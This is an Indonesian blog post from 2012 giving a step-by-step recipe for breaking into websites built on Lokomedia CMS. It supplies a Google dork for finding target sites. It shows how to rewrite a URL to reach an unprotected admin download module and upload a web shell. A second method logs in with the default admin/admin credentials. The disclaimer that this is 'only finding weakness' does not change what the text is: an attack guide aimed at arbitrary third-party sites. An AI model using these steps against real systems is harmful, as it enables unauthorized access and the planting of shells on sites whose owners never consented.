» » » BUG cms buatan anak Bangsa
Saturday 24 March 2012

by
2 comments In
Bug CMS Lokomedia | Cara Bug CMS Lokomedia

 Langsung saja...

1. masuk google www.google.com
2. Masukan dork ini "inurl:semua-download.html" tanpa kutip 2
3. setelah menemukan target ex: www.site.com/semua-download.html

Inject : ganti semua-download.html jadi adminweb/content.php?module=download
Ex : www.site.com/semua-download.html menjadi www.site.com/adminweb/content.php?module=download

kalau terdapat bugnya nanti ada file file yg sudah diupload , dan ada tulisan Tambah Download dan upload Shell nya

Cara ke 2

Dork : inurl:semua-download.html

Inject : /adminweb/
ex: site.com/semua-download.html
menjadi site.co/adminweb/

biasanya para admin melakukan kesalahan dengan menggunakan user dan password default

User : admin
Pass : admin

Jika disalah satu web target adminnya lengah kita bisa masuk ke modul admin..

INI BUKAN MERUSAK , INI HANYA MENCARI KELEMAHAN PADA ADMIN..!!

SPECIAL THANKZ TO http://travismarkshihab.blogspot.com/
Posted by at 02:09
Share:

2 comments:

Subscribe to: Post Comments (Atom)
 
Toggle Footer